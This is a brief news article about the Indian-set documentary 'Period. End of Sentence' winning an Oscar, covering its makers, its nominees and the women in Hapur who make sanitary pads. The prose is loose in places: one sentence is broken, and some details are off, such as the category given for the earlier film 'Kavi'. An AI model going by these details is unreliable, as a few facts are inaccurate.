At the 91st Academy Awards on Monday, ‘Period. End of Sentence’ won Oscar for Best Documentary Short Film that fights disgrace surrounding menstruation in rural India. This film is directed by Rayka Zehtabchi and is produced by Guneet Monga’s Sikhya Entertainment and is inspired by the real-life ‘Pad Man’, Arunachalam Muruganantham.
The film ‘Period. End of Sentence’ was made by Oakwood High School students, who found that ‘The Pad Project, a non-profit organization whose aim is to fight the humiliation of menstruation. The other nomination in the category for Best Documentary Short Film at the 2019 Academy Awards was ‘Black Sheep’, ‘End Game’, ‘Lifeboat’ and ‘A Night at the Garden’.
In an acceptance speech, Zehtabchi said that she is not crying because she is on her period or something. She couldn’t believe that a film on menstruation can win an Oscar.
After winning the award producer Guneet Monga posted a tweet that every girl on this Earth’ must party to her victory. This is not for the first time that Guneet Monga has made it to Oscar. Her film ‘Kavi’ was nominated in the short documentary category. At that time she didn’t have money to buy a ticket for the ceremony. This year she just didn’t make it to Oscar for the second time, but also brought it home.
This 26-minute short film ‘Period. End of Sentence’ is about a group of women in Hapur, Utter Pradesh when they learned to use a machine which produced low biodegradable sanitary pads. They sell that to other women under the brand name FLY. Through this film Period, the director wanted to make menstruation as a taboo-free matter.
